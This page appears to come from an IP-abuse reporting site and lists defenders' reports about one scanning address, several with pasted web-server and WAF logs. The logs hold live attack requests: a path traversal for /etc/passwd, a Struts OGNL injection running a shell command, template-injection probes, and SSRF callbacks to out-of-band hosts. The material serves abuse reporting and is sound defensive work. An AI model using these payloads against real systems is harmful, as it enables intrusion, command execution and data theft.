|
๐ง๐ช
cmbplf
|
|
22 requests with url.path *.dll
|
Brute-Force
Bad Web Bot
|
|
|
๐บ๐ธ
mnsf
|
|
Too many Status 40X (17)
|
Brute-Force
Web App Attack
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:211190) triggered by 154.38.187.64 (vmi2773933.contaboserver.net): 1 ...
show more
(mod_security) mod_security (id:211190) triggered by 154.38.187.64 (vmi2773933.contaboserver.net): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Sep 22 23:28:46.130527 2025] [security2:error] [pid 25456:tid 25456] [client 154.38.187.64:43458] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||ac.cloudex.link|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "ac.cloudex.link"] [uri "/export/classroom-course-statistics"] [unique_id "aNIT7nJDoV5TDMmF5pxftQAAAAQ"]
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐น๐ท
rtbh.com.tr
|
|
list.rtbh.com.tr report: tcp/0
|
Brute-Force
|
|
|
๐ซ๐ท
dynamix
|
|
Multiple WAF Violations
|
Web App Attack
|
|
|
๐น๐ท
rtbh.com.tr
|
|
list.rtbh.com.tr report: tcp/0
|
Brute-Force
|
|
|
๐น๐ท
rtbh.com.tr
|
|
list.rtbh.com.tr report: tcp/0
|
Brute-Force
|
|
|
๐ง๐ช
cmbplf
|
|
22 requests with url.path *.dll
|
Brute-Force
Bad Web Bot
|
|
|
๐ซ๐ท
Murazaki
|
|
mehdibenadel.com 154.38.187.64 - - [20/Sep/2025:06:54:07 +0200] "POST /cgi-bin/rpc HTTP/1.1" 404 569 ...
show more
mehdibenadel.com 154.38.187.64 - - [20/Sep/2025:06:54:07 +0200] "POST /cgi-bin/rpc HTTP/1.1" 404 56912 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/127.0 Safari/537.36" "172.22.0.56:80"
mehdibenadel.com 154.38.187.64 - - [20/Sep/2025:07:20:53 +0200] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 56912 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" "172.22.0.56:80"
mehdibenadel.com 154.38.187.64 - - [20/Sep/2025:07:30:30 +0200] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 56912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" "172.22.0.56:80"
mehdibenadel.com 154.38.187.64 - - [20/Sep/2025:07:54:35 +0200] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 56912 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" "172.22.0.56:80"
mehdibenadel.com 154.38.187.64 - - [20/Sep/2025:07:57:57 +0200] "POST /cgi-bin/su
...
show less
|
Bad Web Bot
|
|
|
๐ซ๐ท
cydit.eu
|
|
phpMyAdmin attack detected by fail2ban on thor.cydit.eu
|
Web App Attack
|
|
|
๐ซ๐ท
COMAITE
|
|
Common web attack from 154.38.187.64.
|
Web App Attack
|
|
|
Anonymous
|
|
154.38.187.64 - - [19/Sep/2025:19:36:00 +0200] "GET /oauth/authorize?response_type=${13337*73331}&cl ...
show more
154.38.187.64 - - [19/Sep/2025:19:36:00 +0200] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 18605 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
154.38.187.64 - - [19/Sep/2025:19:42:01 +0200] "GET /composer/send_email?to=SJbr@BBav&url=http://d36ce9jqd7t9dc278p20tn1z63zhxfks3.oast.site HTTP/1.1" 404 18605 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
154.38.187.64 - - [19/Sep/2025:19:48:31 +0200] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://d36ce9jqd7t9dc278p20wrnwc5m5k796f.oast.site HTTP/1.1" 404 18671 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36"
...
show less
|
DDoS Attack
Email Spam
Port Scan
Spoofing
Brute-Force
SSH
|
|
|
๐ฉ๐ช
kernel-error.de
|
|
::ffff:154.38.187.64 - - [19/Sep/2025:05:14:47 +0200] "GET /index.action?redirect:${%23a%3d(new%20ja ...
show more
::ffff:154.38.187.64 - - [19/Sep/2025:05:14:47 +0200] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 11067 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4) AppleWebKit/619.11 (KHTML, like Gecko) Version/17.3.56 Safari/619.11" www.kernel-error.de HTTP/1.1 https 0.200 0.200 404 unix:/var/run/php-fpm.sock TLSv1.3 TLS_CHACHA20_POLY1305_SHA256
::ffff:154.38.187.64 - - [19/Sep/2025:05:14:47 +0200] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodA
...
show less
|
Hacking
Web App Attack
|
|
|
๐ง๐ช
cmbplf
|
|
28 requests with url.path *.dll
|
Brute-Force
Bad Web Bot
|
|
|
๐บ๐ธ
MKWServer
|
|
Reported from Imunify360 blocklist
|
Brute-Force
SSH
|
|